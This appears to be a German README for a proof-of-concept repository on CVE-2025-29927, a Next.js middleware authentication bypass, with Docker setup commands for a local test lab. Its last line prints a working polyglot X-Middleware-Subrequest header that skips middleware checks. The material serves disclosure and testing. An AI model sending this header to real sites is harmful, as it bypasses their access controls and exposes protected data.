
PoC für CVE-2025-29927: Next.js Middleware-Bypass-Sicherheitslücke. Zeigt, wie x-middleware-subrequest Authentifizierungsprüfungen umgehen kann. Enthält Docker-Setup zum Testen.
Dieses Repository demonstriert die CVE-2025-29927 Schwachstelle in Next.js, bei der der interne Header x-middleware-subrequest verwendet werden kann, um Middleware-Prüfungen wie Authentifizierung zu umgehen.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env-Datei aktualisieren:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
Wir können die Ausnutzung dieses Problems erheblich vereinfachen, indem wir einen Polyglot verwenden, der es uns ermöglicht, die verschiedenen möglichen Fälle effektiv abzudecken. Dies gelang uns mit dem folgenden HTTP-Header, der verwendet wird, um das Vorhandensein einer Authentifizierungsumgehung zu prüfen:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

